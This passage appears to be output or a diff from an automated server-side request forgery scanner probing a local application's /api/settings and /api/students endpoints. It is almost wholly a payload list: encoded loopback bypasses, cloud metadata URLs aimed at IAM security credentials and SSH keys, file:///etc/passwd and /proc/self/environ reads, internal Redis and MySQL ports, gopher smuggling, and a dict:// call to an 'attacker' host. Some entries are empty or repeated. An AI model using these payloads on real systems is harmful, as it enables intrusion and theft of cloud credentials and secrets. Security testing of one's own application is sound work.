`http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/settings?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/settings?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/settings?url=instance-data` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A22` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A443` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A80` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/settings?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/settings?url=loopback` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A22` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A80` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A443` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/settings?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/settings?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/settings?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/settings?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/settings?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/settings?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/settings?url=127.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/settings?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/settings?url=2130706433%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235521%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235777%2F` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/settings?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/settings?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/settings?url=0%2F` +- Testing: `http://localhost:4200/api/settings?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/students +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/students?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/students?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/students?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/students?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/students?url=127.1%3A80` +- Testing: `http://localhost:4200/api/students?url=0` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/students?url=localhost%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/students?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/students?url=127.127.127.127` +- Testing: `http://localhost:4200/api/students?url=127.0.1.3` +- Testing: `http://localhost:4200/api/students?url=127.0.0.0` +- Testing: `http://localhost:4200/api/students?url=2130706433` +- Testing: `http://localhost:4200/api/students?url=017700000001` +- Testing: `http://localhost:4200/api/students?url=0x7f000001` +- Testing: `http://localhost:4200/api/students?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/students?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/students?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/students?url=google.com.localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=localtest.me` +- Testing: `http://localhost:4200/api/students?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/students?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/students?url=2130706433%2F` +- Testing: `http://localhost:4200/api/students?url=3232235521%2F` +- Testing: `http://localhost:4200/api/students?url=3232235777%2F` +- Testing: `http://localhost:4200/api/students?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/students?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/students?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/students?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/students?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/students?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/students?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/students?url=0%2F` +- Testing: `http://localhost:4200/api/students?url=127.1` +- Testing: `http://localhost:4200/api/students?url=127.0.1` +- Testing: `http://localhost:4200/api/students?url=localtest.me` +- Testing: `http://localhost:4200/api/students?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/students?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/students?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/students?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/students?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/students?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.1.3` +- Testing: `http://localhost:4200/api/students?url=0` +- Testing: `http://localhost:4200/api/students?url=127.1` +- Testing: `http://localhost:4200/api/students?url=127.0.1` +- Testing: `http://localhost:4200/api/students?url=localhost` +- Testing: `http://localhost:4200/api/students?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/students?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/students?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/students?url=7F000001` +- Testing: `http://localhost:4200/api/students?url=2130706433` +- Testing: `http://localhost:4200/api/students?url=6425673729` +- Testing: `http://localhost:4200/api/students?url=127001` +- Testing: `http://localhost:4200/api/students?url=127_0._0_1` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/students?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/students?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/students?url=localtest.me` +- Testing: `http://localhost:4200/api/students?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/students?url=127.127.127.127` +- Testing: `http://localhost:4200/api/students?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/students?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=0x7f000001` +- Testing: `http://localhost:4200/api/students?url=017700000001` +- Testing: `http://localhost:4200/api/students?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/students?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/students?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/students?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/students?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/students?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/students?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/students?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/students?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254` +- Testing: `http://localhost:4200/api/students?url=2852039166` +- Testing: `http://localhost:4200/api/students?url=7147006462` +- Testing: `http://localhost:4200/api/students?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/students?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/students?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/students?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/students?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/students?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/students?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/students?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/students?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/students?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/students?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/students?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/students?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/students?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/students?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/students?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/students?url=127.0.0.0` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/students?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/students?url=3232235521` +- Testing: `http://localhost:4200/api/students?url=3232235777` +- Testing: `http://localhost:4200/api/students?url=425.510.425.510` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/students?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/students?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/students?url=instance-data` +- Testing: `http://localhost:4200/api/students?url=localhost%3A22` +- Testing: 